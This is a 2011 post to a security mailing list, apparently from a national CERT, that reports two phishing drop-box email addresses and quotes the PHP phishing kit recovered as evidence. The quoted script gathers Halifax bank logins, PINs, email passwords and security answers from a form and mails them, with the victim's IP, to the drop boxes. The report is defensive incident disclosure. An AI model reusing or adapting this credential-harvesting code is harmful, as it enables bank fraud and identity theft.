[nsp-sec] phishing dropboxes at hotmail.com & blumail.org
Rodolfo Baader
rbaader at arcert.gov.ar
Tue Mar 29 09:52:14 EDT 2011
Hi!
while investigating a phishing case, we've found the followings drop boxes:
hotmail -> xmoney2011 at hotmail.com
blumail -> littlewood at blumail.org
Evidence:
==============================================================================
<?
$ip = getenv("REMOTE_ADDR");
$message .= "---------Halifax---------\n";
$message .= "Username : ".$_POST['Username']."\n";
$message .= "password : ".$_POST['password']."\n";
$message .= "--------\n";
$message .= "Your memorable word : ".$_POST['nameofschool']."\n";
$message .= "Your place/town of birth : ".$_POST['placeofbirth']."\n";
$message .= "Your mother's FIRST name :
".$_POST['motherfirstname']."\n";
$message .= "Your mother's maiden name :
".$_POST['mothermaidenname']."\n";
$message .= "Your father's FIRST name :
".$_POST['fatherfirstname']."\n";
$message .= "Your current email address: ".$_POST['emailaddress']."\n";
$message .= "Your email password: ".$_POST['emailpassword']."\n";
$message .= "Your telephone banking pin: ".$_POST['tellbankpin']."\n";
$message .= "Your Six (6) digit number: ".$_POST['sixpin']."\n";
$message .= "Your secret question : ".$_POST['securityquestion']."\n";
$message .= "Your secret answer : ".$_POST['securityanswer']."\n";
$message .= "IP: ".$ip."\n";
$message .= "---------Created By MaGnUm-X--------------\n";
$recipient = "xmoney2011 at hotmail.com,littlewood at blumail.org";
$subject = "Halifax";
$headers = "From";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
if (mail($recipient,$subject,$message,$headers))
{echo
"<script>location.replace('invalid.details.htm');</script>";} ?>
<html>
<head>
More information about the nsp-security
mailing list